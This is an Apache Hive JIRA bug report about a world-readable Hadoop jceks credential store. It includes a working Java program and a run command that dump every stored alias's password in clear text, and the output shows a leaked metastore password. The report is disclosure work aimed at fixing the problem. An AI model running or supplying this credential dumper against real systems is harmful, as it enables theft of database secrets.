Oleksiy Sayankin created HIVE-19746:
---------------------------------------
Summary: Hadoop credential provider allows to read passwords
Key: HIVE-19746
URL: https://issues.apache.org/jira/browse/HIVE-19746
Project: Hive
Issue Type: Bug
Reporter: Oleksiy Sayankin
Assignee: Oleksiy Sayankin

This simple program allows reading any password from any {{jceks}} file:

{code}
package com.test.app;

import java.io.IOException;
import java.util.List;

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

/**
 * Dumps every alias stored in a Hadoop credential provider (for example a
 * jceks file). Nothing beyond read access to the store is required: no
 * keystore password is supplied here, the provider falls back to its default.
 */
public class PasswordReader {

  public static void main(String[] args) throws IOException {
    if (args == null || args.length == 0) {
      throw new IllegalArgumentException("Credential provider path is not set");
    }
    String credentialProviderPath = args[0];

    // Point hadoop.security.credential.provider.path at the store to read.
    Configuration configuration = new Configuration();
    configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);

    // Open the first configured provider and enumerate its aliases ...
    CredentialProvider credentialProvider =
        CredentialProviderFactory.getProviders(configuration).get(0);
    List<String> aliases = credentialProvider.getAliases();

    // ... then resolve each alias to its clear-text value.
    for (String alias : aliases) {
      char[] password = configuration.getPassword(alias);
      System.out.println(alias + " = " + new String(password));
    }
  }
}
{code}

{code}
java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks
{code}

*RESULT*

{code}
javax.jdo.option.connectionpassword = 123456
{code}

File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} permissions and {{hdfs:hdfs}} owner:group. We can't remove world-readable permissions here, because Hive is configured for impersonation to allow users other than {{hdfs}} to connect to HiveServer2.
When I removed world-readable permissions I got this exception:

{code}
2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
	at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
	at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
{code}

Any ideas how to protect passwords?

--
This message was sent by Atlassian JIRA
(v7.6.3#76005)